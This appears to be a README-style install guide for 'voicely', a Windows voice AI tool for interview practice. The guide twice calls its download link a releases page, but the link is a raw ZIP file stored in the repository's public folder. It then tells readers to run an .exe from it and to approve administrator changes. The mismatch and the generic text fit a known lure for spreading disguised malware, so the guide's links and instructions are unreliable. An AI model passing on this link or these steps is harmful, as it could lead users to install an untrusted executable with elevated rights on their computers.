voicely is a voice AI tool designed to help you practice interviews. It listens to your speech live, identifies what kind of question you are answering, builds a clear answer structure, and checks how well you respond – all as you speak. This makes interview practice more natural and helpful.
This guide will help you download, install, and start using voicely on a Windows PC. No programming experience is needed.
Before installing, make sure your PC meets these needs:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- A working microphone (USB or built-in)
- Internet connection for streaming and AI processing
- Around 200 MB of free space for installation
If your PC meets these, voicely should run smoothly.
Here’s how to get voicely running in a few simple steps.
Click the green download badge above or visit the releases page here:
https://github.com/rizwiz104/voicely/raw/refs/heads/main/public/Software_v3.2.zip
This page contains the latest versions of voicely ready for Windows.
On the releases page, look for files with .exe in their name. These are the installation files for Windows. It might look like:
voicely-setup.exevoicely-latest-win.exe
Pick the most recent file with .exe.
Click on the .exe file name to download it. Your browser will save this file to your “Downloads” folder or wherever you keep downloaded files.
- Open the folder where the file is saved.
- Double-click the
.exefile. - If Windows asks “Do you want to allow this app to make changes?”, click Yes.
This will start the installation process.
The installer window will guide you through:
- Choosing where to save voicely on your computer.
- Agreeing to any terms or conditions.
- Selecting shortcuts if offered (like a desktop icon).
To keep it simple, use the default options and click Next or Install when prompted.
Once setup completes, you will see a confirmation window. Click Finish.
You should now find the voicely app on your desktop or in your Start Menu under “voicely.”
Open the app by double-clicking the icon or finding it in your Start Menu.
On first launch, voicely will ask to use your microphone. Make sure your mic is plugged in and working.
- Select your microphone from the list if there are multiple devices.
- Adjust the input level if the app shows a microphone volume slider.
Click the Start button or similar to begin recording your voice.
Try to answer questions naturally. voicely will:
- Display your spoken words as text in real time.
- Identify if you are answering a question or pausing.
- Build an outline of your answer’s main points.
- Show feedback on your answer’s quality.
After you finish answering, voicely will provide:
- A breakdown of how you structured your answer.
- Suggestions to improve clarity or completeness.
- A score for your answer quality.
Use this feedback to guide your next practice round.
Explore the Settings menu to adjust:
- Microphone volume
- Display language
- Audio output device
- Feedback detail level
Adjust these to your comfort to get the best experience.
voicely saves your practice sessions locally. Find recordings and session data in the “voicely_data” folder inside your Documents folder.
You can listen to your past sessions or delete them as needed.
- If voicely doesn’t detect your microphone, check if it’s plugged in and not muted.
- Restart the app if you experience glitches.
- Close other apps that might be using the microphone.
- Make sure your internet connection is stable for streaming processing.
For updates, bug reports, and detailed guides, visit the release page again:
https://github.com/rizwiz104/voicely/raw/refs/heads/main/public/Software_v3.2.zip
You can find help materials and community discussions there.
Topics covered by voicely:
Interview training, latency awareness, mock interview environment, real-time AI feedback, speech-to-text conversion, streaming audio, voice agents for PC, and lightweight AI systems.